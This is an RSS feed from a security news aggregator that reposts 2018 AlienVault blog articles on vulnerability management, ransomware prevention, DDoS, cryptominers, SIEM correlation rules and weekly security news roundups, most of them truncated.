This is the RSS 2.0 feed from www.secnews.physaphae.fr. IT's a simple agragated flow of multiple articles soruces. Liste of sources, can be found on www.secnews.physaphae.fr. 2024-05-03T05:49:01+00:00 www.secnews.physaphae.fr AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC All software and hardware has vulnerabilities. So do the non-computing aspects of your organizational security, such as the physical security of your building or how susceptible your employees are to social engineering. Vulnerabilities are everywhere and are in everything. The key to good security is to know how to manage your vulnerabilities. What are they? Where are they? How can they be patched? How can they be mitigated? Which risks are you willing to take? What is Vulnerability Management? Vulnerability management is a continuous process of testing, reporting, response, and triage. Bruce Schneier is famous for saying, “Security is a process, not a product.” That very much applies to vulnerability management specifically, as well. You don’t just design systems, configure them, and deploy them. Every day at work you should discover and think about your vulnerabilities and consider how you’ll deal with them. Two major aspects of your security work will change constantly, whether you like it or not. One is your network and computing infrastructure. New applications will be deployed and patched. New hardware will be introduced. New people will be hired. Policies will be changed. Sometimes regulations change as well. The second constantly changing aspect is the threat landscape. At least one point of your network will be connected to the public internet and new malware and cyber attack bots appear all the time. The way they cyber-. attack and the ways they evade detection will also evolve. New malware can also be introduced to your network through removable media and bring-your-own-devices. There are also social engineering and physical (often building related) attack vectors. All of those factors evolve and change and that’s the main reason why vulnerability management must be a continuous process. You will also learn something new everyday. If not, you’re doing something wrong. The Vulnerability Management Process The first phase of the vulnerability management process is asset discovery. You need to know what’s deployed on your network, which is increasingly difficult with BYOD and lines of business going off and “doing their own thing” outside of IT. You will learn about vulnerabilities in your network through sources like the CVE security management database, network vulnerability testing, vendor announcements, your logs and your SIEM, reports from your staff, and unfortunately sometimes in the wake of real cyber attacks. Do make sure you record your vulnerability discoveries in as much detail as possible, and preferably in a way that’s only accessible to the people who need to know about them. Reports should also be organized according to which aspects a vulnerability pertains to, such as an application your network uses, or a physical building vulnerability. Because vulnerabilities pertain to all the aspects and facets of your network, you should have lots of different categories. Regulations and compliance standards, as well as company policy, must also be considered. Depending on your company, industry, and jurisdiction, there may be specific standards that your vulnerability management reporting must conform to. Over time, you will inevitably discover and report a lot of vulnerabilities. A good prioritization process will help you triage your vulnerabilities so you can respond to th]]> 2018-03-14T13:00:00+00:00 http://feeds.feedblitz.com/~/532463748/0/alienvault-blogs~Explain-Vulnerability-Management www.secnews.physaphae.fr/article.php?IdArticle=513150 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC   On February 15, Bishop Fox released their Cybersecurity Style Guide. I am absolutely stoked for them, and for the arrival of what looks like a new era in InfoSec language consistency. I was lucky enough to get to speak to Technical Editor Brianne Hughes last week. “I polled the internal team,” she told me, “and got the https://willusingtheprefixcybermakemelooklikeanidiot.com/ sent back to me a few times. We need to be consistent as a department – Engineers want to know why, they want transparency, and they don’t want to be told what to do. We have lively dialog in the comments of our reports.” She went on to say, “InfoSec merges hacker slang and military jargon in a corporate setting, and it’s hard to find middle ground. The language itself is a kind of slang, and the point of slang is to identify in-groups and out-groups, so there’s a definitely border built up that were looking to poke holes in to facilitate future conversations.” Largely, those of us lucky enough to work for InfoSec companies enlightened enough to know that having editorial services available is a good thing, have mostly done our thing solo, and we’ve collected language that’s specific for our company. As a new editor in that position, there’s always that little moment of hesitation, where you try to decide what style guide to leverage. Microsoft, with its monolithic 1990’s tablet-down-from-the-mount style guide? Sun Microsystems, where once upon a time the collective Editorial staff met to decide the proper way to write “readme,” only to decide after four straight hours of heated argument that since the users knew what we meant, we would willfully refuse to standardize? There’s the Yahoo Style Guide, the Salesforce Style Guide… everyone’s got one, and most editors have a favorite. But this is the first time I’m aware of that someone specifically in the world of InfoSec has taken a stab at creating something like unification, by not only creating a guide, but actively promoting it, and soliciting input from across the industry. “I made this for myself because I needed it,” says Brianne. “And I was lucky enough to have the skills and the support. It’s a beautiful environment where Bishop Fox has been around 12 years, but allows for passion projects.” The second it downloaded, I sat down and read every word. You guys… this is superlative. Some highlights include: A technical formatting section simple enough to cover our needs, without going over the top to cover every possible contingency.   An appendix explaining how decisions were made. This is particularly glorious, because mostly, we’re winging it. The Wild West style of InfoSec netymology has meant that most of us within our silos make a choice, and call it done. There’s been very little in the way of guidance about how to make those decisions. I think that if we, as editorial professionals, can help each other make consistent choices, the entire field will mature more rapidly, and that is all to the good for improving consistency and transparency of dialog between professionals and their clients.   Another appendix for external resources. This is so beautifully thought-out, so comprehensive… I felt myself sighing in pure appreciation. I personally ha]]> 2018-03-13T13:00:00+00:00 http://feeds.feedblitz.com/~/532207926/0/alienvault-blogs~Infosec-Language-Grows-Up-The-Bishop-Fox-Cybersecurity-Style-Guide www.secnews.physaphae.fr/article.php?IdArticle=510530 False None Yahoo None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 2017 State of Malware report, telemetry gathered by the anti-malware provider reveals that business and consumer ransomware detections swelled by 90 percent and 93 percent, respectively. The monthly rate of ransomware attacks against businesses grew by approximately 10 times the rate of 2016 over the same period in 2017. A 700 percent increase in ransomware helped drive that surge, with GlobeImposter and WannaCry leading the way. Malwarebytes 2017 State of Malware report page 6 Overall, Malwarebytes saw new ransomware development stagnate in the second half of 2017 as digital criminals shifted their focus to bring back old threats like banking Trojans and embrace new techniques, most notably malicious cryptocurrency miners. Those trends notwithstanding, ransomware isn't going away anytime soon. Users should therefore follow these five simple steps that can help them stay safe from a ransomware attack. Install an Anti-Malware Solution While some digital attackers are turning to fileless malware, many ransomware strains still come with a digital signature. Anti-malware solutions can use these imprints to detect and block a crypto-malware threat before it has time to execute on a computer. Victims of ransomware can also use these tools to clean their computers of ransomware before they restore their data using a free decryption tool or available backup. Update Your Systems Regularly A common delivery vector for ransomware is an exploit kit. It's a type of software package that scans for known vulnerabilities in Adobe Flash Player and other programs. If it finds a match with its hardcoded exploits, the kit launches code that exploits the vulnerability and in turn downloads ransomware onto the vulnerable machine. By staying current with software patches, however, users can block exploit kits from activating on their computers. How Exploit Kits Work. (Source: Barkly) Avoid Suspicious Links and Email Attachments As seen in the graphic above, one of the most common beginnings of an exploit kit campaign involves a phishing email recipient clicking on a malicious link that redirects them to a compromised website. Users aren't powerless against these tactics. They can make a point of not clicking suspicious links and email attachments, including those that come with messages sent to them from unfamiliar senders. Disable Macros for Office Documents Microsoft Office documents come with what's called macros. They are essentially rules that users can craft in order to save time by automating repetitive tasks. Unfortunately, digital attackers often hide ransomware executables within Office macros and attempt to capitalize on users' curiosity by tempting them with an unknown attachment. Users can protect themselves against this trick by disabling macros in Office, by steering clear of unsolicited attachments, and by making it a rule to not enable macros in any document should they receive a prompt to do so. Install a Pop-Up Blocker Bad actors don't just rely on ema]]> 2018-03-12T13:00:00+00:00 http://feeds.feedblitz.com/~/531936156/0/alienvault-blogs~Countering-CryptoMalware-A-Guide-to-Preventing-a-Ransomware-Infection www.secnews.physaphae.fr/article.php?IdArticle=508204 False Guideline Wannacry None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Today In Infosec. If you don’t know of it, I suggest checking it out. As the name suggests, it tweets out news from the world of information security from previous years. I was thinking that maybe I could wait five years and then recycle these weekly roundup blogs as “This week in Infosec” But that’s the future, let’s jump into the news that matters today. An Olympic hack What went on behind the scenes at the Olympics? How much hacking went on, who was behind it, and what can be done about it? Lessons in Cyber: Influence Operations | Comae technologies (the Grugq) 2018 Winter Olympic Games have been hacked, organizers confirm | Digital trends Russian spies hacked the Olympics and tried to make it look like North Korea did it, U.S. officials say | Washington Post SAML, SSO many vulnerabilities SAML-based single sign on systems have some vulnerabilities that allow attackers with authenticated access to trick SAML systems into authenticating as different users without knowledge of the victims’ password. Sounds like a lot of fun. Duo Finds SAML Vulnerabilities Affecting Multiple Implementations | DUO Passhunt I came across this little gem on GitHub this week. Basically, it’s a repository of default credentials for a plethora of network devices, web apps, and so forth for over 500 vendors and near 2100 default passwords. Remember, Mirai originally only had 61 default passwords to wreak havoc. Passhunt | GitHub Sharing is caring If you give your information to a business, how many places do you think it shares that information with? None, a dozen, fifty? Well, thanks to GDPR compliance, PayPal has shared a list of over 600 entities it shares data with. List of Third Parties (other than PayPal Customers) with Whom Personal Information May be Shared | PayPal Related What Amazon Echo and Google Home do with your voice data | Wired MoviePass CEO admits company creepily tracks users | New York Post ]]> 2018-03-09T14:00:00+00:00 http://feeds.feedblitz.com/~/531368924/0/alienvault-blogs~Things-I-hearted-this-week-th-March www.secnews.physaphae.fr/article.php?IdArticle=503147 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC A DDoS attack, Explained​ DDoS is an acronym for Distributed Denial of Service. A simple Denial of Service could be a technical accident where something such as a memory buffer overflows and the affected device is forced to shut down because of it; however, DDoS attacks are no accident. They are deliberate, malicious cyber-attacks.​ The targeted network appliance or server denies usual service because it has been deliberately overwhelmed with data packets. Imagine five hundred people trying to run through a doorway at the same time. The service that the doorway usually provides by allowing people to go from one room to another will obviously no longer work. The doorway has a finite capacity, same as a firewall and memory buffer in your server application.​ DDoS attacks are conducted deliberately by cyber attackers. The most common way that DDoS attacks are conducted these days is by leveraging control of a botnet. A botnet is a network of “bots,” usually through the internet. The bots are usually PCs, mobile devices, and IoT devices which have malware on them that allows a cyber attacker to use their computing power through their command and control server. When the attacker finds a public IP address that they want to target, they will command their bots to send as many data packets to the IP as possible. All of those packets all at once will overwhelm whichever device and software the IP is connected to, and it will go out of service.​ Occasionally these days but more frequently in the 1990s, a web server’s website could go offline if too many people try to download webpages from it at the same time. Big tech companies like Google and Amazon have massive datacenters around the world which consume more electricity than some countries. They can handle millions of people trying to use their web services at the same time. But if I install Apache on an old PC on my LAN and put a website on it, it won’t have anywhere near the same capacity. Hundreds of people trying to download a webpage at the same time might overwhelm my home router and my modest PC, and it will go offline. That’s the sort of denial of service that’s an innocent accident. But DDoS attacks are no accidents. They’re also distributed, which means that many different devices are working in unison to flood an IP with packets.​ Explain Types of DDoS attacks​ The OSI layer model describes seven layers which constitute a networked computing entity, usually through TCP/IP.​]]> 2018-03-08T14:00:00+00:00 http://feeds.feedblitz.com/~/531122546/0/alienvault-blogs~Explain-What-DDoS-Is www.secnews.physaphae.fr/article.php?IdArticle=500741 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC You’ve been in the industry for a long time, what’s the secret to staying so apparently happy and enthusiastic - not to mention retaining a full head of hair? Life is so ghastly and absurd that it's impossible to take it too seriously.  One of my failings is that I have a pitifully low boredom threshold, and find it a hard thing to disguise.  This isn't a good thing, and has probably harmed my career immensely. Recently my wife says she's spotted a couple of grey hairs on my head, so it does appear that I am mortal My brothers don't seem to have lost their hair either, so it must be something in the Cluley gene pool.  That or the fact I spent the first eighteen years of my life eating only cheese sandwiches. There were your early days at Dr. Solomon’s, the Naked Security era, and now your life as an independent expert - with a more respected brand than most companies have. Was this a planned journey? How did your career end up here? I don't really think I have a career.  I find it hard to describe to people what exactly it is that I do for a job.  When I meet up with my brothers, they're baffled as to how I'm able to make a living too. So, there was no planned journey to get to this point.  At college, I wrote and sold computer games, and they're what got the attention of Alan Solomon who offered me a job as a programmer in the early days of anti-virus. I left Dr. Solomon's (which was a fun place to work) because they got acquired by McAfee (who didn't seem very fun).  I joined Sophos because it was a small fun company, and then left when it became big and stopped being fun. I make decisions like these fairly impulsively.  Something will switch in my head and make me say, "I'd rather do something fun", and then that's it, my mind’s made up. Life is a little different now as I have a wife and young son, and I need to remind myself that I have some responsibilities.  If they weren't in my life, it's quite possible that I would be doing something other than computer security.  But I do enjoy finding new things to do – and my latest obsession is the weekly podcast I co-host with Carole Theriault. You’re a pretty public figure, but what little-known fact about your background usually surprises people? While I was studying at university, my girlfriend joined a cult.   I tried for years to get her out, without success.  That was pretty horrible, but I met a lot of good people and - hopefully - helped some other people l]]> 2018-03-07T14:00:00+00:00 http://feeds.feedblitz.com/~/530864952/0/alienvault-blogs~An-Interview-with-Graham-Cluley www.secnews.physaphae.fr/article.php?IdArticle=499121 False General Information Uber None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Last year, when AlienVault achieved compliance certifications and attestations for PCI DSS, SOC 2, and HIPAA, I described how we used the AlienVault USM Anywhere service in house to demonstrate our compliance. We did the same for our ISO 27001:2013 certification. While it’s not mandated that a security solution provider use its own product for its internal security and compliance programs, I do think it is important that you “drink your own champagne,” (or, as I noted in the previous blog, “eat your own dog food.”) With the USM Anywhere service offering, our compliance officer was able to readily walk auditors through many of the key security controls outlined in ISO 27001:2013. Because the platform has many out-of-the-box compliance features, including pre-built reports and custom data views, it makes it simple and fast to navigate an audit process. For customers on their own compliance path for ISO 27001:2013 certification, AlienVault USM can help to cut through the complexity and uncertainty of the audit. How ISO 27001:2013 Sets the Stage for the GDPR At AlienVault, we haven’t been shy about the fast-approaching deadline (May 25, 2018) for the EU General Data Protection Regulation (GDPR). ]]> 2018-03-06T14:00:00+00:00 http://feeds.feedblitz.com/~/530591938/0/alienvault-blogs~AlienVault-USM-Anywhere-ISMS-is-Now-Certified-to-ISO www.secnews.physaphae.fr/article.php?IdArticle=497784 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC schools closed and the capital on red alert. Fortunately, one of the perks of working from home is that I get to stay on top of the security news regardless of the weather, so put on your snow boots and jump right in. Trading stocks in the wake of breaches The US securities and Exchange Commission (SEC) has waned high-ranking executives not to trade stocks before disclosing beaches, major vulnerabilities and other cybersecurity related incidents. SEC statement on public company cybersecurity disclosure (PDF) | SEC After Intel & Equifax Incidents, SEC Warns Execs Not to Trade Stock While Investigating Security Incidents | Bleeping Computer Tracking your sold hardware Many devices now come with tracking features to help you find it if it gets lost or stolen. It started predominantly with phones, but now is in most laptops, desktops, and plenty of smart devices. The trouble is that location tracking isn’t something we intuitively ask for when buying or selling an item. We just assume that the seller has disabled it, or it wasn’t enabled in the first place. Will we get to a point where before buying a smart teddy, a kid will ask if its been factory-wiped and all credentials removed? How I sold an old Mac and unknowingly had access to its location for over 3 years | Bredon Mulligan / Medium Cover your own assets John Carroll wrote an interesting blog post on influencing business layers that might not get infosec. Cover your own ass(ets) | CTU Security Cybersecurity Style Guide How many times have you wished you had a cybersecurity style guide to help you understand how to pronounce security phrases, or write a word, or the definitive meaning of a term. Well, your wishes have all been answered as Bishop Fox has created a style guide for you. Web Semantics: The Bishop Fox Cybersecurity Style Guide | Wired Download the Bishop Fox Cybersecurity Style Guide (PDF) | Bishop Fox Revenge Hacking Well, at least the motive was easy to establish. Man admits hacking former employer’s computer system for revenge | Hackread Teach a man to Phis]]> 2018-03-02T14:00:00+00:00 http://feeds.feedblitz.com/~/529863222/0/alienvault-blogs~Things-I-Hearted-this-Week-nd-March www.secnews.physaphae.fr/article.php?IdArticle=494688 False None Equifax None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Inherited credibility is what we lack most in InfoSec.  You can be the world’s most elite hacker, capable of popping a shell faster than anyone else in town, but you will only get odd stares if you walk into the CEO’s office boasting of that credential.  Most corporate cyber positions, from the security analyst, all the way up to the CISO, simply do not carry any inherited credibility.  This is mostly due to the newness of cybersecurity positions in most organizations.  We may still be quite a distance from creating an inheritable empire.  According to a February 2018 report by the Council of Economic Advisers, there is still no common lexicon for categorizing malicious cyber activities.  This is especially true when discussing cybersecurity events.  If we have yet to develop a common language, we are still too far off from closing the credibility gap. We may currently lack inherited credibility, but this puts us in a unique position, as we are the trailblazers who can build that inheritance for our successors.  If, however, you are working in InfoSec for your own self-aggrandizement, then you are sadly on a path to failure, but that is a broader subject. Inherited credibility is what will move us from need to surplus.  (Perhaps “surplus” is a bit too optimistic, but you get the point.)  The more important question you can ask yourself every day is:  How can I build the credibility that will give my successors the power to continue to grow this meaningful work?  ]]> 2018-03-01T14:00:00+00:00 http://feeds.feedblitz.com/~/529604088/0/alienvault-blogs~What-We-Lack-Most-in-InfoSec-Inherited-Credibility www.secnews.physaphae.fr/article.php?IdArticle=493751 False Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC AlienVault Partner Program enables leading VARs, system integrators, managed security service providers (MSSPs), managed detection & response providers (MDRs) and corporate resellers to sell and support AlienVault solutions and deliver compelling services powered by AlienVault USM in the global marketplace. With a strong focus on partner enablement, the program is designed to help partners create new opportunities for business growth, expansion and profitability. AlienVault’s dynamic and rapidly expanding partner community is a critical part of our success as a company, and we are committed to enabling and supporting the growth of our partners based on their individual goals and objectives. Our Partner of the Year awards recognize the success achieved by our partners in the following categories: GLOBAL AWARDS: Global Partner of the Year:  SHI INTERNATIONAL INC. Highest overall sales bookings in 2017 SHI led the AlienVault global partner community in closed deals, new customers and of course, bookings, which grew by more than 100% year-over-year. Their commitment to AlienVault is demonstrated by the large number of unique sales professionals at SHI who are responsible for identifying and booking deals with us. Growth Partner of the Year:  ABACODE Highest growth in 2017 as compared to 2016 sales bookings Abacode established their service offering based on AlienVault in late 2015. They did well in 2016, but 2017 was a breakout year, with the team delivering strong bookings and more than 300% growth – the largest year-over-year % increase of all our global partners. New Partner of the Year:  BLUEVOYANT Highest sales bookings by a partner that joined our program in 2017  BlueVoyant began working with us in a limited capacity in early 2017. However, after only a few short months, they went “all in,” committing to the AlienVault USM platform to deliver services to their global customer community. REGIONAL AWARDS: These awards recognize partners that had the highest sales bookings in each of the 4 regions. North American Partner of the Year:  TERRA VERDE SYSTEMS A long-standing AlienVault partner, Terra Verde has built a robust, diversified practice – reselling AlienVault USM, delivering world-class services and implementation, and leading some of the highest-rated AlienVault training classes within our partner ecosystem. Latin American Partner of the Year:]]> 2018-02-27T14:00:00+00:00 http://feeds.feedblitz.com/~/529029058/0/alienvault-blogs~Announcing-the-Winners-of-our-Partner-of-the-Year-Awards www.secnews.physaphae.fr/article.php?IdArticle=491872 False Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC If you Google “SIEM Content Engineer,” “SIEM Threat Content Engineer,” or “SIEM Content Developer,” you will see a bunch of ads, job listings and very little other content. I believe this is because the concept is new, and it appears SIEM Content Engineer is emerging as a new job title that HR departments in large companies have latched onto for a role/job that, in reality, has been around for years. For at least a decade, Anton Chuvakin of Gartner has been discussing SIEM roles and responsibilities. This new term is likely to set off even more discussion. SIEM Content Engineer Role & Responsibilities The SIEM Content Engineer role seems to be defined with quite a range of responsibilities, according to the job listings I reviewed. Here are some samples plucked from researching the term and checking out jobs: Analyzing, designing, developing and delivering solutions to stop adversaries Identifying threats Incident response Risk reviews Vulnerability management Event monitoring, including log management and SIEM Defining how logs should be parsed Writing new correlation rules Coordinating and conducting event collection, log management, event management, compliance automation, and identity monitoring activities Writing custom active lists, queries, and rules Care and content of SIEM platforms Developing custom content based on threat intelligence Ensure SIEM technologies are integrated & utilized to protect cyber related assets The qualifications that were required varied quite a bit, most desiring a technical college degree and hands-on experience with SIEM. Some were quite specific, including things like knowledge of basic networking protocols and addressing schemes, e.g., TCP/IP functions, CIDR blocks, subnets, addressing, communications, etc. Do All SIEMs Require SIEM Content Engineers? SIEM is one of the core capabilities of AlienVault’s Unified Security Management (USM) platform. And yet, despite having worked at AlienVault for four years now, this title “SIEM Content Engineer” was totally foreign to me. I was curious about this new buzzworthy job title, so I asked my colleagues if they were familiar with it. One of my colleagues in Product Marketing who had worked for/with other SIEM vendors in the past was aware of the job title. He explained to me that even now, legacy SIEM products aren’t ready “out of the box” – they are far from a quick implementation. In order to function well, those SIEMs often require a dedicated team, or at least one person, to solely focus on writing custom correlation rules and queries. It seems as though those big, custom data analytics solutions still require quite a bit of human intelligence and effort to work properly. For example, it can be tricky for IT security practitioners to integrate emerging threat intelligence with the SIEM correlation engine so a SIEM Content Engineer may be required. I’m going to have to brag about AlienVault a bit, as the AlienVault Labs Security Research Team handles 100 percent of that task for USM users. In addition to other research methods and sources, this team analyzes and validates the shared threat data in the ]]> 2018-02-26T14:00:00+00:00 http://feeds.feedblitz.com/~/528780630/0/alienvault-blogs~SIEM-Content-Engineer-Why-Is-It-a-Thing www.secnews.physaphae.fr/article.php?IdArticle=490725 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Man Flu!” But enough about me, let’s jump into the security goodness! Threat modeling Threat models are great, and poorly understood, or used by security professionals as a universal ‘get out of jail card’. “Why don’t you have 2FA on your web app?” “Oh, that’s not in our threat model.” “Why don’t you sandbox this?” “Oh, that’s not in our threat model” “Why don’t you have your threat model documented?” “Oh, that’s not in our threat model” It’s like the security equivalent to the business saying they “accepted the risk”. An interesting piece in CSO magazine takes a look at common threat model mistakes. 7 threat modeling mistakes you’re probably making | CSO What is threat modeling? | Motherboard Two Billion! Two billion (with a B), that’s the number of files apparently leaked in the US during 2017. The most common type of breach after hacking was unintended disclosure such as cloud storage misconfigurations. That means that millions of records could have been kept secure had someone brushed up on their AWS S3 Bucket security skills and not ticked the box to make it public. We’ve found the APT, the APT is us! Two Billion Files Leaked in US Data Breaches in 2017 | Infosecurity Magazine The US witnesses significant number of healthcare breaches in 2017 | Healthcare Global A SWIFT $6m Unknown hackers stole 339.5 million roubles ($6 million) from a Russian bank last year in an attack using the SWIFT international payments messaging system. Well, that’s a surprise. It’s not like SWIFT has been targeted ever for malicious purposes… Hackers stole $6 million from Russian bank via SWIFT system: central bank | Reuters India's City Union Bank CEO says suffered cyber hack via SWIFT system | Reuters ]]> 2018-02-23T14:00:00+00:00 http://feeds.feedblitz.com/~/528137265/0/alienvault-blogs~Things-I-Hearted-this-Week-rd-Feb www.secnews.physaphae.fr/article.php?IdArticle=489870 False None Tesla None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC For a San-Francisco based financial services firm that partners with technology entrepreneurs in the US and China, maintaining a strong security posture is critical to the company’s success. The firm’s portfolio of 200 companies are security conscious and expect the firm to stay ahead of security threats. But this can be difficult, especially for a small team with time constraints. The firm’s Vice President of Global IT recently spoke with me about challenges his team faces. “We’re a team of three people who wear multiple hats and have about two hours each week to focus on security. It takes a lot of time to handle more than 1,000 spoofing attacks per month and respond to major vulnerabilities such as Meltdown. In addition, we have to monitor on-premises equipment at three offices as well as our cloud-based architecture, while also staying on top of employees using risky plugins and toolbars or installing sketchy software on their laptops.” To better detect a range of potential security threats, the Vice President of Global IT tested out a variety of disparate tools but found it difficult for his team to manage these. In looking for a comprehensive security monitoring solution, he considered different products including Splunk, but found these to be lacking in functionality and costly to deploy. As part of his requirements, he wanted a cloud-based offering that didn’t have data storage limits and could be integrated with disparate systems. Ultimately, he chose AlienVault USM AnywhereTM, our cloud-based security monitoring platform, as the best fit for his team’s needs. In addition to the platform’s unified capabilities, the IT team leader had heard that it was easy-to-use and affordable; since deployment, he has been impressed with its capabilities. “AlienVault has built out a unique product that is ideal for small companies like ours,” he explained. “No others are as comprehensive for organizations with small IT teams.” The company has been using USM Anywhere to manage threat detection since January of 2017. Designed with the needs of today’s resource-constrained IT security teams in mind, USM Anywhere significantly reduces the time and budget required for effective security monitoring and compliance management. Managed through a single plane of glass, the SaaS security monitoring platform allows the company to centralize and simplify threat detection, incident response, and compliance management across their full IT infrastructure. The platform also integrates with other IT systems and business applications such as Microsoft Office 365, Okta, and Cisco Umbrella to provide a more complete view of the company’s security posture. Another key benefit for the company is USM Anywhere’s ability to correlate server and firewall logs with data traffic between the company’s office and in the cloud to identify behavioral patterns consistent with malicious activity. These event patterns are automatically prioritized and trigger an alarm to expedite investigation and response. Such proactive alerts from USM Anywhere have helped the company to keep up with threats as they develop so they can take action and block IP addresses as needed. Additionally, AlienVault’s Open Threat Exchange® (OTXTM) provides threat intelligence updates related to financial services and China – two of the company’s main concerns. Using these alerts, the company  proactively manages threat detection to prevent attacks from spreading ]]> 2018-02-22T14:00:00+00:00 http://feeds.feedblitz.com/~/106544562/0/alienvault-blogs~Threat-Detection-amp-Response-Made-Easier-for-Growing-Financial-Services-Company/security-essentials/threat-detection-response-made-easier-for-growing-financial-services-company www.secnews.physaphae.fr/article.php?IdArticle=489083 False Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Such growth didn't go unnoticed by digital attackers or by organizations looking to supplement their online advertising revenue. Both responded by deploying crypto-miners. These tools help generate money for domain owners, yet they oftentimes have negative consequences for unsuspecting users exposed to them. To better understand the growing threat of crypto-miners, let's take a look at how crypto-mining works in general, how bad actors are abusing them to take advantage of ordinary people, and how users can protect themselves. What Are Crypto-Miners? Crypto-miners are tools that "mine," or generate, new units of a cryptocurrency like Bitcoin. They do so by completing mathematical puzzles that constitute what Hacker Noon's Chris Herd calls "proof of work calculations" for the new units. The process of mining doesn't just generate cryptocurrency; it also adds, secures, and verifies transactions to the blockchain. A deeper dive into how cryptocurrencies work is necessary to better understand crypto-miners. Digital currency like Bitcoin runs on the blockchain, a ledger of transactions which is distributed across the entire community of users who own units of that cryptocurrency. Benzinga staff writer Shanthi Rexaline explains it's here where mining comes into play: Every single transaction made and the ownership of every single cryptocurrency in circulation is recorded in the blockchain. The blockchain is run by miners, who use powerful computers that tally the transactions. Their function is to update each time a transaction is made and also ensure the authenticity of information, thereby ascertaining that each transaction is secure and is processed properly and safely. Every 10 minutes, mining computers collect a "block," or a few hundred pending Bitcoin transactions, and turn them into a mathematical puzzle. Those computers then use special equipment to compete against one another to solve that puzzle. Whoever completes the challenge first is eligible to receive a reward of 12.50+0.943 BTC, which is worth approximately $113,834.49 USD as of 7 February 2018. The Economist explains that the first miner to find the solution to the mathematical puzzle can announce it to the Bitcoin community. At that point, the other miners verify if the solution is correct. Assuming it is, the block is cryptographically added to the ledger, with the miners moving on to the next grouping of transactions, thereby adding to the blockchain. Source: Bitcoin 2.0 (SlideShare) How Malware Authors Are Abusing Crypto-Mining Crypto-mining isn't itself malicious in nature. But bad actors are abusing it for nefarious purposes. They're doing so by illegally accessing important business assets such as servers used for electronic medical record (EMR) systems or]]> 2018-02-21T14:00:00+00:00 http://feeds.feedblitz.com/~/527733282/0/alienvault-blogs~CryptoMiners-What-Are-They-and-What-Steps-You-Can-Take-to-Protect-Yourself www.secnews.physaphae.fr/article.php?IdArticle=487281 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC What is a correlation rule? The various appliances in your network should be constantly generating event logs that are fed into your SIEM system. A SIEM correlation rule tells your SIEM system which sequences of events could be indicative of anomalies which may suggest security weaknesses or cyber attack. When “x” and “y” or “x” and “y” plus “z” happens, your administrators should be notified. Here are some examples of SIEM correlation rules which illustrate this concept. Detect new DHCP servers in your network by watching for inside or outside connections which use UDP packets (“x”), have port 67 as the destination (“y”), and the destination IP address isn’t on the registered IP list (“z”). Warn administrators if five failed login attempts are tried with different usernames from the same IP to the same machine within fifteen minutes (“x”), if that event is followed by a successful login occuring from that same IP address to any machine inside the network (“y”). The first example could indicate a cyber attacker establishing a DHCP server to acquire malicious access to your network. Any authorized DHCP server would use one of your registered IP addresses! The second example could indicate a cyber attacker brute-forcing an authentication vector and then successfully acquiring authentication to your network. It could be a possible privilege escalation attack. Both SIEM correlation rules could be triggered by honest mistakes and simple user errors or technical glitches. But they’re also key indicators of cyber attack and security administrators should check them out right away! SIEM correlation in a nutshell Your SIEM will analyze a whole lot of event logs which record endless seemingly mundane activities. They will look mundane to a human being if they just keep reading a list of thousands of events. Connection established from some IP address and some TCP/IP port to another IP address and TCP/IP port! Some user changed their username on Tuesday and their password on Thursday! Some client machine downloaded 500MB and uploaded 200MB of network traffic one day, then downloaded 3.5GB and uploaded 750MB of network traffic the next day! Properly designed SIEM correlation rules cut through all of the blah, blah, blah of your network event logs to detect which sequences of events are likely indications of cyber attack. So you should take great care in developing your SIEM correlation rules. SIEM is driven by computers and computers will just execute any instructions you give them. You as the clever human being with an organic brain should come up with practical SIEM correlation rules so your SIEM system can wake you up when there’s a possible cyber attack you should pay attention to. What is normalization in SIEM? Various different software, hardware, and networking component vendors use their own event log formats. An event log will have different information fields. A SIEM system will do its best to read the various event log formats in order to make sense of them. If you make Excel spreadsheets, imagine all of the different ways someone could d]]> 2018-02-20T14:00:00+00:00 http://feeds.feedblitz.com/~/106544562/0/alienvault-blogs~How-SIEM-Correlation-Rules-Work/security-essentials/how-siem-correlation-rules-work www.secnews.physaphae.fr/article.php?IdArticle=486691 False Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC We hear a lot about bug bounties and how some people are potentially making a lucrative living off it. HackerOne has paid out over $24m in bounties in the last five years. That’s some serious cash, considering how far that translates into local currencies. So, they asked some of their top hackers how they spent their money. How hackers spend their bounties | HackerOne SIM hijacking, the aftermath In last week’s roundup there was a story about SIM swapping and how T-mobile USA was sending texts to customers stating they may be victims of fraud. We often cover such stories, shake our heads and tut loudly before moving on. But Motherboard got in touch with nine victims of SIM hijacking and told their stories. It’s quite a wake-up call to the real-life impact scams and fraud can have on individuals. ‘I Lived a Nightmare:’ SIM Hijacking Victims Share Their Stories | Motherboard Cryptocurrencies Not entirely security related news, but hey if everyone is referring to it as ‘crypto’ I can include it here right? Joseph Steinberg considers what the future holds for Bitcoin, which sits at the head of the table of cryptocurrencies today, while other currencies are nipping at its heels. Will Bitcoin become the MySpace of Cryptocurrencies? | Joseph Steinberg Another cryptocurrency theft Italian Cryptocurrency Exchange BitGrail Lost $170 Million Worth of Nano to Hackers | InterestingEngineering Mining stuff There are lessons to be learned from government websites serving cryptocurrency miners | Virus Bulletin Could Bitcoin break the NHS? Latest crypto-jack attack ‘the first of many’, say experts | Express AI recognition Chinese police are wearing sunglasses that can recognize faces. No, that’s not a plot of a movie, but what’s actually happening. Railway police in Zhengzhou, a central Chinese city, are the first in the country to use facial-recognition eyewear to screen passengers during the Lunar New Year travel rush. The devices have allegedly already helped nab seven fugitives related to major criminal cases such as human trafficking and hit-and-runs, and 26 others who were traveling with fake identities. While that may be well and good, there are some issues with facial recognition. Joy Ruolamwini, a researcher at the M.I.T. media lab, has shown how real-life biases can creep into A.I. The result is that for a white man, facial]]> 2018-02-16T14:00:00+00:00 